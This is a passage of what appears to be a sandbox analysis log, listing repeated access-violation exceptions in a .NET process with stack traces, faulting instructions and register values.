RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d854d3 registers.esp: 3007984 registers.edi: 3008324 registers.eax: 0 registers.ebp: 3007992 registers.edx: 0 registers.ebx: 3010924 registers.esi: 45575512 registers.ecx: 45811456	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d86342 0x4d86151 0x4d80c6d 0x65f6d4 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d81b62 registers.esp: 3007696 registers.edi: 3007996 registers.eax: 0 registers.ebp: 3008008 registers.edx: 14846584 registers.ebx: 3010924 registers.esi: 45573776 registers.ecx: 0	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85490 0x4d867aa 0x4d86151 0x4d80c6d 0x65f6d4 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d854d3 registers.esp: 3007984 registers.edi: 3008324 registers.eax: 0 registers.ebp: 3007992 registers.edx: 0 registers.ebx: 3010924 registers.esi: 45573776 registers.ecx: 47302252	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d86342 0x4d86151 0x4d80c6d 0x65f6d4 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d81b62 registers.esp: 3007696 registers.edi: 3007996 registers.eax: 0 registers.ebp: 3008008 registers.edx: 14846584 registers.ebx: 3010924 registers.esi: 45573776 registers.ecx: 0	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85490 0x4d867aa 0x4d86151 0x4d80c6d 0x65f6d4 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d854d3 registers.esp: 3007984 registers.edi: 3008324 registers.eax: 0 registers.ebp: 3007992 registers.edx: 0 registers.ebx: 3010924 registers.esi: 45573776 registers.ecx: 48792760	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d86c1c 0x4d86a39 0x4d80c55 0x65f7da 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d81b62 registers.esp: 3007728 registers.edi: 3008028 registers.eax: 0 registers.ebp: 3008040 registers.edx: 14846584 registers.ebx: 3010924 registers.esi: 45573776 registers.ecx: 0	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85490 0x4d86fdc 0x4d86a39 0x4d80c55 0x65f7da 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d854d3 registers.esp: 3008016 registers.edi: 3008324 registers.eax: 0 registers.ebp: 3008024 registers.edx: 0 registers.ebx: 3010924 registers.esi: 45573776 registers.ecx: 45793212	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d86c1c 0x4d86a39 0x4d80c6d 0x65f7da 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d81b62 registers.esp: 3007728 registers.edi: 3008028 registers.eax: 0 registers.ebp: 3008040 registers.edx: 14846584 registers.ebx: 3010924 registers.esi: 45573776 registers.ecx: 0	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85490 0x4d86fdc 0x4d86a39 0x4d80c6d 0x65f7da 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d854d3 registers.esp: 3008016 registers.edi: 3008324 registers.eax: 0 registers.ebp: 3008024 registers.edx: 0 registers.ebx: 3010924 registers.esi: 45573776 registers.ecx: 47240640	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d86c1c 0x4d86a39 0x4d80c6d 0x65f7da 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d81b62 registers.esp: 3007728 registers.edi: 3008028 registers.eax: 0 registers.ebp: 3008040 registers.edx: 14846584 registers.ebx: 3010924 registers.esi: 45573776 registers.ecx: 0	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85490 0x4d86fdc 0x4d86a39 0x4d80c6d 0x65f7da 0x65e469 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d854d3 registers.esp: 3008016 registers.edi: 3008324 registers.eax: 0 registers.ebp: 3008024 registers.edx: 0 registers.ebx: 3010924 registers.esi: 45573776 registers.ecx: 48733444	1
__exception__ July 24, 2023, 7:34 a.m.	stacktrace: 0x4d85490 0x4d88363 0x4d8790e 0x65e4c1 0x65d9ff 0x657855 0x656f0b 0x653c6b 0x6535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d854d3 registers.esp: 3008836 registers.edi: 3009100 registers.eax: 0 registers.ebp: 3008844 registers.edx: 0 registers.ebx: 3010924 registers.esi: 49275128 registers.ecx: 49282104	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x809901 0x809703 0x807710 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x809a38 registers.esp: 3927076 registers.edi: 3927128 registers.eax: 0 registers.ebp: 3927140 registers.edx: 4428312 registers.ebx: 3928580 registers.esi: 45850280 registers.ecx: 0	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28a73f9 0x28a725a 0x28a712d 0x28a59e3 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28a803a registers.esp: 3925316 registers.edi: 3925616 registers.eax: 0 registers.ebp: 3925628 registers.edx: 16824572 registers.ebx: 3928580 registers.esi: 46557040 registers.ecx: 0	1
__exception__ July 24, 2023, 7:35 a.m.	stacktrace: 0x28ab970 0x28a79c4 0x28a725a 0x28a712d 0x28a59e3 0x28a4b79 0x80d9ff 0x807855 0x806f0b 0x803c6b 0x8035d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x28ab9b3 registers.esp: 3925604 registers.edi: 3925948 registers.eax: 0 registers.ebp: 3925612 registers.edx: 0 registers.ebx: 3928580 registers.esi: 46557040 registers.ecx: 47806624	1
